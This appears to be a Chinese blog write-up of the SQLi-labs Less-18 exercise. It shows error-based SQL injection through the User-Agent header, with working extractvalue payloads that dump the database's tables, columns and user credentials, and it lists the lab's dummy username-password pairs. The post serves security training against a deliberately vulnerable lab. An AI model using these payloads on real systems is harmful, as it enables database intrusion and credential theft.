zoukankan      html  css  js  c++  java
  • Less(18) Header Injection

    1.报错型,单引号,user-agent型注入

      

       看到user-agent 的回显,猜测注入点在user-agnet,可以直接测试,但是还是去看看php文件吧:

        

       发现也对password也做了check

        

         又看到了inseert语句,他把user-agent插入到数据库,所以可以从这里下手,而且看到除开是单引号型,接下来开始爆破

     2.爆破:

      (1)把user-agent修改一下就行:'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and'

          

     没毛病,可以爆破

      (2)爆库之前都爆过了  

      (3)爆表:' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))  and'

        

      (4)爆列名:' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in('user_id','first_name','last_name','user','avatar','last_login','failed_login'))))  and' 

        

       (5)爆值:' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))  and' 

      

         

        通过 not in(),我们可以找到所有的用户名和密码:

        Dumb:Dumb    Angelinal:I-kill-you   Dummy:p@ssword   secure:crappy   stupid:stupidiry   superman:genious   batman:mob!le   admin:admin   admin1:admin1   admin2:admin2   admin3:admin3   dhakkan:dumbo   admin4:admin4

  • 相关阅读:
    poj 2251 Dungeon Master-搜索进阶-暑假集训
    棋盘问题-POJ 1321
    Popular Cows
    The Factor
    整数解 (hdu 2092
    Strange fuction hdu 2899
    Factors and Multiples
    Trailing Zeroes (III) -;lightoj 1138
    Swap——hdu 2819
    Arithmetic Sequence
  • 原文地址:https://www.cnblogs.com/meng-yu37/p/12303639.html
Copyright © 2011-2022 走看看